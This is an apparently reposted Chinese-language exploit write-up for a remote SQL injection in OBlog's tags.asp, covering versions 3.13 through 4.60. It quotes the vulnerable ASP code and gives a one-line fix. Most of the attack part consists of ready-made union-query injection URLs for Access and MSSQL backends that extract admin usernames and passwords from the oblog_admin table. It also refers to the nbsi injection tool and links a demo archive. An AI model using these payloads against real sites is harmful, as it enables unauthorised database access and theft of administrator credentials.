OBlog (tags.asp) Remote SQL Injection Exploit
<FONT face=宋体>官方已经修正该漏洞。<BR><BR>–==+=================== www.nspcn.org =================+==–<BR>–==+ OBlog (tags.asp) Remote SQL Injection Exploit +==–<BR>–==+====================================================================================+==–<BR><BR>#Author: Whytt & Tr4c3126com<BR>#版权所有:</FONT><A title=http://www.nspcn.org href="http://www.nspcn.org/" target=_blank><FONT face=宋体>http://www.nspcn.org</FONT></A><FONT face=宋体> & & Whytt<BR>#漏洞文件tags.asp<BR><BR>#影响版本:<BR>3.13-20060429 <BR>4.02-20070112 <BR>4.50 Final Build0619 <BR>4.60 Final Build0921 <BR>4.60 Final Build1107 <BR>#漏洞原因:变量tagid未经过滤传值,带入sql执行,导致注入产生。<BR>#修补方法:检查用户提交的tagid,只允许是数字。<BR>例如:<BR>将iTagId = Trim(Request.Querystring(”tagid”))改成iTagId = Clng(Trim(Request.Querystring(”tagid”)))<BR><BR>[+++]<BR>这 个地方的注射是去年whytt在读OBLOG 4.5的时候发现的,当时没仔细看,只是听他说适用于mssql版,今天在搞一个站的时侯遇见了Oblog 4.60 Final Build1107 (Access),百般无奈又去看了看那个放了N久的”mssql注入点”,这一看不要紧,扩展成了access和mssql通杀。<BR>[+++]<BR>再来啰嗦一下代码的问题tags.asp行15-36<BR><BR>sType = LCase(Trim(Request.Querystring(”t”)))<BR>iTagId = Trim(Request.Querystring(”tagid”)) ’这个地方没过滤,在36行处传值给函数GetUsersByTag<BR>iUserId = Trim(Request.Querystring(”userid”))<BR>sKeyword= Trim(Request(”keyword”))<BR>sAll=Trim(Request.Querystring)<BR>If sAll & sKeyword=”" Then sType=”hottags”<BR><BR>Call link_database()<BR><BR>select Case sType<BR>Case ”hottags”<BR>sTitle=”最热门的100个” & P_TAGS_DESC<BR>sContent=Tags_Hottags()<BR>Case ”cloud”<BR>sTitle=P_TAGS_DESC & ”云图”<BR>sContent=Tags_SystemTags(1)<BR>Case ”list”<BR>sTitle=P_TAGS_DESC & ”列表”<BR>sContent=Tags_SystemTags(0)<BR>Case ”user”<BR>sTitle=P_TAGS_DESC & ”用户”<BR>sContent=GetUsersByTag(iTagId)<BR><BR>函数GetUsersByTag的原型在文件Inc_Tags.asp行320-338<BR><BR>Function GetUsersByTag(byval sTagId)<BR>Dim rst,sSql,sContent<BR>Set rst = Server.CreateObject(”Adodb.Recordset”)<BR>sSql = ”select Top 100 b.userName,b.user_dir,b.user_folder From (select Userid From oblog_usertags Where Tagid=” & sTagId & ” Group By UserId) a,oblog_user b Where a.Userid=b.UserId”<BR>rst.Open sSql,conn,1,1<BR>If rst.Eof Then<BR>sContent=”没有符合条件的用户”<BR>rst.Close<BR>Set rst = Nothing<BR>End If<BR>i=0<BR>Do While Not rst.Eof<BR>sContent=sContent & ”<a href=”& blogurl& rst(”user_dir” target=_blank) & ”/” & rst(”user_folder”)&”/index.” &f_ext&” target=_blank>” & rst(”userName”) & ”</a><br/>”<BR>rst.movenext<BR>Loop<BR>rst.Close<BR>Set rst = Nothing<BR>GetUsersByTag=sContent<BR>End Function<BR><BR>之所以当初whytt说只适用于mssql,是当时没想起来如何无错闭合,仔细想想原来这么简单.<BR><BR>select Top 100 b.userName,b.user_dir,b.user_folder From (select Userid From oblog_usertags Where Tagid=1 Group By UserId) a,oblog_user b Where a.Userid=b.UserId union select Top 100 b.userName,b.user_dir,b.user_folder From (select Userid From oblog_usertags Where Tagid=1 Group By UserId) a,oblog_user b Where a.Userid=b.UserId<BR><BR>union前后是一个语句当然不会出错了,但是<BR><BR>select Top 100 b.userName,b.user_dir,b.user_folder From (select Userid From oblog_usertags Where Tagid=1 Group By UserId) a,oblog_user b Where a.Userid=b.UserId and 1=2 union select Top 100 b.userName,b.user_dir,b.user_folder From (select Userid From oblog_usertags Where Tagid=1 Group By UserId) a,oblog_user b Where a.Userid=b.UserId and 1=2 ’ 为了返回union后面的语句信息,union前面的限定条件加一个and 1=2 [逻辑假]<BR><BR>这样就报错了,利用起来也是很简单的,打开</FONT><A title=http://www.target.com/oblog/tags.asp,点开一个有返回内容的连接 href="http://www.target.com/oblog/tags.asp,点开一个有返回内容的连接" target=_blank><FONT face=宋体>http://www.target.com/oblog/tags.asp,点开一个有返回内容的连接</FONT></A><FONT face=宋体>(注意是有返回内容,而不是标题,当然不怕麻烦也可以自己注册发表文章和标签),看tagid,如图1<BR></FONT><A href="http://www.neeao.com/blog/attachments/200804/29_090537_5.jpg" target=_blank rel=lightbox target=_blank><FONT face=宋体><IMG height=258 alt=attachments/200804/29_090537_5.jpg src="http://www.neeao.com/blog/attachments/200804/29_090537_5.jpg" width=500 onload="<i">javascript</I>:DrawImage(this);></FONT></A><BR><FONT face=宋体>这里我们看到的是1。组合下url就是<BR><BR></FONT><A title=http://www.target.com/oblog/tags.asp?t=user&keyword=trace&tagid=1 href="http://www.target.com/oblog/tags.asp?t=user&keyword=trace&tagid=1" target=_blank><FONT face=宋体>http://www.target.com/oblog/tags.asp?t=user&keyword=trace&tagid=1</FONT></A><FONT face=宋体> Group By UserId) a,oblog_user b Where a.Userid=b.UserId and 1=2 union select Top 100 b.userName,b.user_dir,b.user_folder From (select Userid From oblog_usertags Where Tagid=1<BR><BR>放在nbsi里手动加入表oblog_admin,开始你的注射…<BR><BR>如果你比较懒,就用union查询吧<BR><BR>Access:<BR></FONT><A title=http://www.target.com/oblog/tags.asp?t=user&keyword=trace&tagid=1 href="http://www.target.com/oblog/tags.asp?t=user&keyword=trace&tagid=1" target=_blank><FONT face=宋体>http://www.target.com/oblog/tags.asp?t=user&keyword=trace&tagid=1</FONT></A><FONT face=宋体> Group By UserId) a,oblog_user b Where a.Userid=b.UserId and 1=2 union select username%2bchr(124)%2bpassword,2,3 From Oblog_admin union select Top 100 b.userName,b.user_dir,b.user_folder From (select Userid From oblog_usertags Where Tagid=1 and 1=2<BR>MSSQL:<BR></FONT><A title=http://www.target.com/oblog/tags.asp?t=user&keyword=trace&tagid=1 href="http://www.target.com/oblog/tags.asp?t=user&keyword=trace&tagid=1" target=_blank><FONT face=宋体>http://www.target.com/oblog/tags.asp?t=user&keyword=trace&tagid=1</FONT></A><FONT face=宋体> Group By UserId) a,oblog_user b Where a.Userid=b.UserId and 1=2 union select username%2bchar(124)%2bpassword,2,3 From Oblog_admin union select Top 100 b.userName,b.user_dir,b.user_folder From (select Userid From oblog_usertags Where Tagid=1 and 1=2<BR><BR>如图2<BR></FONT><A href="http://www.neeao.com/blog/attachments/200804/29_090607_52.jpg" target=_blank rel=lightbox target=_blank><FONT face=宋体><IMG height=281 alt=attachments/200804/29_090607_52.jpg src="http://www.neeao.com/blog/attachments/200804/29_090607_52.jpg" width=500 onload="<i">javascript</I>:DrawImage(this);></FONT></A><BR><FONT face=宋体>附利用动画<BR></FONT><A title=http://www.tr4c3.com/upload/oblog.rar href="http://www.tr4c3.com/upload/oblog.rar" target=_blank><FONT face=宋体>oblog.rar</FONT></A><BR>
页:
[1]